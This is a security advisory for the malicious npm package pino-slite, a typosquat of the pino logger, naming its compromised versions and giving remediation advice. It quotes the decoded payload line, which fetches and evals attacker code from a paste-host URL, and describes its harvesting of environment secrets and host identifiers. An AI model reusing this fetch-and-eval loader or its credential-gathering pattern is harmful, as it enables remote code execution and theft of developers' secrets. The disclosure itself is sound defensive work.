VYPR

npm · Malicious package advisory

Malware

pino-slite

MAL-2026-6078

Malicious code in pino-slite (npm)

Details


---
_-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (ea546461f3101a972511a0bb9d66b73849904ad3522724d1670b003e108c11bb)
pino-slite impersonates the legitimate `pino` logger (README titled 'pino-slite (Pino)' with badges and homepage pointing to getpino.io, exported function named `pino`). On require(), lib/writer.js (loaded transitively from the package main pino.js) decodes a base64 string and passes it to eval(atob(hash)). The decoded payload performs `fetch('https://jsonkeeper.com/b/0DWFC').then(r=>r.json()).then(d=>{eval(d.ret);})`, executing attacker-controlled JavaScript fetched from a mutable third-party paste host on every load. Immediately before the eval, the module assembles a `data` object containing `{...process.env, version, platform: os.platform(), hostname: os.hostname(), username: os.userInfo().username, macAddresses: <non-internal IPv4 MACs>}`, which is in scope for the remotely-fetched code — providing a ready-made channel to exfiltrate the installer's full environment (CI secrets, AWS_*, NPM_TOKEN, GH tokens, etc.) and host identifiers. This combines a typosquat lure, an import-time RCE dropper from an attacker-controlled mutable URL, and an environment-credential harvester.

Compromised versions (2)

  • 4.1.16
  • 4.1.12

Any computer that installed or ran a compromised version should be considered fully compromised. Rotate every secret on that machine from a clean environment.